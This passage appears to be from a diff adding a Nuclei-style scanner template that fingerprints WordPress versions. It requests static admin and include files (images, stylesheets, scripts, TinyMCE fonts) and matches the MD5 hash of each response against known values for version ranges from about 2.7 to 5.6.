matchers: + - type: dsl + name: 3.9 - 4.9.16 + dsl: + - "(\"f5e118653f892606682ee9c51d0aba99\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"83e904eb31b68fa48cfdbcaa64ef2966\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"887b335656b4ed4656ac1c1966e4254b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/resize-rtl.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"db9217196313c95a59d43601da19c51d\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"d982b0845bb1b67b2b2db7dd805c8737\" == md5(body))" + - type: dsl + name: 3.2 - 3.8.35 + dsl: + - "(\"ddaa579f547c7877730ae2a599a0a0df\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"6e43258f59d8669c88f876b5462e0e7a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/spinner-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"5c1371bcb4392968647852a9c9df5d6c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"20ab276845ebcd6cfbf170fb82e8caf1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"de8c334862726c0a51cc0b3664b60035\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"31fd991e90e6329d865e23e638b50ff4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/resize-rtl-2x.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"f7c99ee74014fe92541012303aaadc7d\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"39a1182eec9c2d959f6cc0a145a55b9a\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"fcd61114e538d359a80d419d6554f55e\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"cf154dd5ef93f9a84df148f521fe5941\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/spinner.gif" + matchers: + - type: dsl + name: 4.1 - 4.9.16 + dsl: + - "(\"b0a3dde331637e27aa6476d476481871\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"239a4f2d29907ca59c723e81c102e86c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0e12da48af1dbb4379e55c76dcb4f58d\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"d54cf50a44bd0aca6fd98bd46acbb2ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/l10n-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"395ebbb01f0499dc79323d9e46bf99c9\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"15e9d8008259ea9efd13495d1b0fa110\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"db1efc9ef2967c05b500794a813de4c2\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"c14f53b547661c4be7bd9a8e38dcdb5d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/l10n.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"55d6b57d8020d981dd12e3308c6d326e\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"48226e1fae8c43c0c82c1995a8555c40\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"6fa315b18e9016357bc9f8c1b32524f5\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"2b2ed5045b480dcfac2e6babbd2f2007\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/code-editor-rtl.min.css" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"7637efd464f4dc9069c33f7833335917\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"ec293f73d213bb45f413489b1be4ddd1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/code-editor.min.css" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"72c3a5be39a933d8763bdd8f10b3e69a\" == md5(body))" + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"4f2bbc906ad777689f33ed3a8e11de4e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"b32d5cea64b4fd156f47c0ec0a9d8532\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-fetch.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"456c02ee2a496580a24e5aee614ba9b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"89a4e64830ce633b60f1e4060faa5726\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"8e8cdd77e6e80407255b55c41dc533a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-element-closest.js" + matchers: + - type: dsl + name: 5.0 - 5.6 + dsl: + - "(\"3c6accf0039920bf3c59748c23f4261d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/esprima.js" + matchers: + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"645f991220db5392f167abb9d99bb493\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/fakejshint.js" + matchers: + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"35c876f72c524f6c78065d4a27294b1b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/underscore.js" + matchers: + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"f893e294cde60c2462cb19b35aac431b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/colorpicker/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"543f57b60e1bb0ccc7234008d2e0ba1d\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"22538c49f524050bd8300b44526abc2a\" == md5(body))" + - type: dsl + name: 4.0 - 4.2.29 + dsl: + - "(\"66ed7befbb2773566ed188e1d3b97cc4\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"783a6e647e90523f40158eec5a12f999\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"fc025b0a68f5ac5cfb7af7d9aebbeaf2\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"1f2043b8c3c8ad3f64847bd7ad568581\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"b8176b7448cc4a20744ca6c5e88e4c41\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"e10227de7811e15dc17a31abf79b9338\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.7.3 + dsl: + - "(\"68c99b9ceacf91b4e3c3b471ba349cf2\" == md5(body))" + - type: dsl + name: 4.2 - 4.5 + dsl: + - "(\"a5ca0a92e1bdf1fbf3f9a07db5573092\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"870511532b062a500c95ae81e1cf23d3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d02999f00764899d370b2eb1a56a5f95\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9ee18d31f9106a72a4ce6232064be838\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"a8755e1442ead9a4d91bb150338cf406\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"d5da6dc53df2bff42ff9155d426a1794\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"c4dc76993c68e4e4e8f0ceeeff70fc0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/textcolor/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"484993eb38dba1019988702c7c8021a6\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.7.19 + dsl: + - "(\"5272a99516c467771ef3076422beb18f\" == md5(body))" + - type: dsl + name: 4.3 - 4.5 + dsl: + - "(\"ff76dd12efde3c20a321d00058535b3f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f6f2de940de4a60ee25d7cff7a0ceab3\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"1149b1a1442a543492ba931ff0b66ad5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"78ddcc09dafb8cda5e889bbc78905ed4\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"ecdce896b4d8a990f3e4cd5dba46e4c0\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"03c6de7649cd96f85b56ff3e3e02e6be\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"02dc2569a033c9e1d6c966e4e8fbdade\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/hr/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"a3b1b0b468820d74eaff4f341cf797f8\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"428c9fb47a7b83fa0440a15886d0b11a\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"b4853cda3c7b4c55371939381cecdb86\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"22137a5439e008cf130d8a0c8e335795\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"fd7ae993f8817e35a0caabd6c0744ac0\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"a40ec96b2b25c1356c33e6c1212db9b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"0bc0eefce537ac2df5bed92c13badf2b\" == md5(body))" + - type: dsl + name: 4.3 - 4.7.19 + dsl: + - "(\"5f21385b1f4513568d611d595040d141\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"2a8fc756a0859acaac1b9d20481979f5\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"c7be1a485e0a213bbb979352c97e497a\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"90a8e01e559f995cb8eb526a8d97e8c5\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"2601d622e85809262029c6cf3dca8024\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/zxcvbn-async.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"97a79e96a815b200139356055d752333\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"21a0938b5ced5349b5071d0c9bfe6923\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"133d902461d45b5a46295e0a9f13f17e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/hoverIntent.js" + matchers: + - type: dsl + name: 4.2 - 5.0.11 + dsl: + - "(\"cab3598b438a9e63984f1c6e9dd79b01\" == md5(body))" + - type: dsl + name: 3.6 - 4.1.32 + dsl: + - "(\"4502421f188ad9e38079741edc36e118\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"73e23cc2a686c50a9f80746d5fde8eb5\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e7b615fa36594e4ba18d0b71ca0b39c8\" == md5(body))" + - type: dsl + name: 2.8 - 3.3.3 + dsl: + - "(\"1fb2abfd1de9863aa4fb38e4c5dd8ac3\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"d0d5fed467b2ac6c1b79e88ec7a8b514\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"c0d37a2f50f79db4eaaeb10c3c170990\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wpdialog.js" + matchers: + - type: dsl + name: 3.9 - 5.0.11 + dsl: + - "(\"72e8395fd44d4039009c5396888fa6ba\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"c6b779020a09eebd206570dcd4a90666\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-list-revisions.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"47510d7560d22a974c8c0eec6e24bcbd\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"10b8adab39fa790c52bac5c59cead9a8\" == md5(body))" + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"a539afdba6c8cc71a580347083eee7d1\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"5019624f50b503784fa5727337a9b532\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/language-chooser.js" + matchers: + - type: dsl + name: 4.0 - 5.0.11 + dsl: + - "(\"09e20150c7561d0330d7158f744abb4a\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"bc08d5fe72ba491b870cbb590ff93a88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-suggest.js" + matchers: + - type: dsl + name: 3.9 - 5.0.11 + dsl: + - "(\"1e33290807fa8b2829ddb0347d0a9305\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"6d5e23d3e9c18375703c379fe2eeb0ed\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a475074c6a346983f461e0ee48269edb\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"846c3cc0ede47e280f7ed75066394d36\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"b9a41a61b44bc13d90f8861d6cb273b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-fullscreen-stub.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"968528cb325471eb001fd8578a8625e5\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"0cc3913290e7f2383692254f9a03c586\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a06bba3593bca1f919fbb48fda7a24cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/deprecated-media.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"2257f52a92d7817195c7ea9659345ec0\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"4073bd9326592a74f14d1eb051d246a4\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"0ada8c65bb367cab1cabc0defa1ac6a6\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"afb8e2f834d79d6e4735f1e96adbef5f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d729315fbe131ad6b6fed3c6fb27af69\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"eb2ea5040c616ab1da534bfa6940d877\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"bb1687b14f439591b839d9bbbb834166\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff" + matchers: + - type: dsl + name: 4.7.4 - 4.9.5 + dsl: + - "(\"a7a41ea9358b658ec53e9d042334c1a8\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"6b0c3754b1cd1f90566e174098fae8f8\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"5acd099f84c92a932b0e2897f49be665\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"90a61cfad08585040f6bebe2234d8aae\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"04e761d506e64836afab5d2550a3b8df\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"9267f79bc730290c6e2c90f9353d3ccf\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"50c955d592e8a54a0e4cb4936d386076\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg" + matchers: + - type: dsl + name: 4.7.4 - 4.9.5 + dsl: + - "(\"7262d908f15434ec7c3ae2126bc87350\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"ede808f6f04604681b25f843069de379\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"006a3d1ce8aad3f9d3d6a9c3f6129a36\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"0d83661ec506e1571bee29a7cba9e2c2\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"f38d04d3a3cf83c12435370fd77c997d\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"b84225c5a236c3f6cc1aded9afcf48dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"d031f47facf4331979b6f9fbac3187ef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot" + matchers: + - type: dsl + name: 4.7.4 - 4.9.5 + dsl: + - "(\"6196b6eb25b52ac8bbe4a94e6da8ae27\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"240310067afb33df60639d7fd1fa132e\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"a4e6a52223e2edbd1bc2b621ec7c08c3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"50b8dc1736855fc2b8d71d669b0eabf7\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"248f6caf6179ea6c4035b7eaec7edd6e\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"6401227790b9e544ef6b8d749cd0a358\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"06189313e1c7504e1edaa12766c2cfd9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf" + matchers: + - type: dsl + name: 4.7.4 - 4.9.5 + dsl: + - "(\"aefbfcb02f143d3b3d3e47ff3de8efb1\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"1fb250c3b9bc34fd53cd883070e3dffd\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"20eaff7be8a4f2cde874a39a898155c4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"04f99db6f827ff1f7c68d6bc6b38ca99\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"d2673bd2dd98e5359b733f57ee3c4778\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"f8d2925604a55d7b8604a9875b8e70d3\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"db33e7676b65cdbfddbe8cdce17ca068\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-embed.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"b8d94a6648c7a70c0496257bb2699599\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.6.20 + dsl: + - "(\"1c577cfb3bb7bf736f663243e04dc2f6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.2 + dsl: + - "(\"2463b0d386cc5e574f4c6702ecd36490\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.8 + dsl: + - "(\"fdf2054f397ff2b9a724c63fbe1013ef\" == md5(body))" + - type: dsl + name: 4.9.9 - 5.0.11 + dsl: + - "(\"74194cbcf228ab10c16d37fded70705b\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"23e24e824f384c5eb11e73576b4ac93c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-formdata.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2265a1bd3059b1a457381c86d5dd9052\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"ed823838339ca0f88793fa781fc1e10d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"7f233f44898ccd1f7284963110804e5f\" == md5(body))" + - type: dsl + name: 5.1 - 5.6 + dsl: + - "(\"2ea232d2a383e59441dc21dc56300749\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"29628f240ceb396ef0b56da19cf30f8c\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"2d76574de73331ae9a0bae951abc5490\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f62d0a9886eca92d1dba632dc5f46f1d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"db4a9159f318b8a8d1dce9cd40628d51\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"46dca3fdd473c8b6cec51e3ff5d700c6\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"4106f98f5e50d92365ae8de1bb31b17e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"eedd69d39fbf83d70c4a58388d86b78e\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1adb87b01b6c9adc1d7c8945f5cd06cd\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"a3c0334eac78e5a18d33185363c6bc50\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"dce16834bbccd5cd685549a17fb33f54\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4cea98cb05da1da6b9f302f8f34fd16b\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"d3948c5ae3ff777bee390743048c01ed\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"63b9fc0fc0d229a570d73b78f182f030\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"d2b699f14ca35864ecdd61c8eec9604d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/ie.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"3ad10e15b536d246988e4107372192ad\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"135aac1749fb85f75120b1391ace9b2c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ece593e9a38bcf8e294ccb0e5618cb92\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"155dad24f705111873d99ba61cf7ac98\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"494254d427a06ead698729501d1706c9\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"057d4b0dc0761731460c3a78711242cf\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"7f6bf805e4601032047107ba844e06a6\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"af04e0352749d2834d0f8ff8bbcd1727\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c48f03938beb59b2bc71921974abd386\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"eed95b401c0cbd317ef19bfda30dd91f\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"3ce438c585dd0ae1a261fafbf8d88629\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"c2f2191e1ed405bd0ba32bf2cc6f7bad\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"1447ed1679f787adc186df8eac30ce1e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ec0296e848d93d9d119ae07bc0085a3b\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"76ca02b48506b7c718e88c0b1d1cee08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/code-editor.css" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4633889cc5ae0bd0607d589c1eacae8c\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2982623d3fb11fcd05f8eb36b84cb557\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"19df2fb667479f623db601ed0ac2f185\" == md5(body))" + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"434192ef92ee1de6c2d24ffa1b5eee29\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/sodium_compat/src/Core/Curve25519/README.md" + matchers: + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"1659a2aacf9bd1767f6a9fd70ac085cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/sodium_compat/src/Core32/Curve25519/README.md" + matchers: + - type: dsl + name: 5.2 - 5.6 + dsl: + - "(\"1659a2aacf9bd1767f6a9fd70ac085cf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-sanitize.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.2 + dsl: + - "(\"60b4efeac56fd08f7ba4f0f48e915dae\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"3e03f2d302e5c48328d7bbf14a518f5e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"345ce3beb91fab17ded64b7914e47a98\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5e8febbd8db3d3de4c68ec632b6883fe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tw-sack.min.js" + matchers: + - type: dsl + name: 3.7.34 - 5.2.9 + dsl: + - "(\"bc4487194e1f88126b8a500ad47e6889\" == md5(body))" + - type: dsl + name: 3.9 - 4.2.29 + dsl: + - "(\"a1c18227e6e93798c493aed96ee6cc84\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"fb8bf6785e55e9e39bea552635c42a64\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"f103f8c3fb6d11562faf82f3943459c7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a3b3fabcf845edad4a169343add9b94b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"18da1537e85888cf774f9c1985710c61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/json2.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"35d899a81986173f44f9bbe686cc583c\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"c9858d42fa9f0d03f5e62ffda9c4b491\" == md5(body))" + - type: dsl + name: 3.7.34 - 4.3.25 + dsl: + - "(\"34a938334208cacfd97631b04283ddd9\" == md5(body))" + - type: dsl + name: 3.7 - 4.2.29 + dsl: + - "(\"ef4188cb0b60a72017f4c8a1e840ab1e\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"ba3293970e13b03a2ea92f5b6b5bf544\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c5fe2b8725d6986faa885f6dcc1771dc\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"733e4f25a6dd1b1bd1094e711666aeda\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-custom-header.min.js" + matchers: + - type: dsl + name: 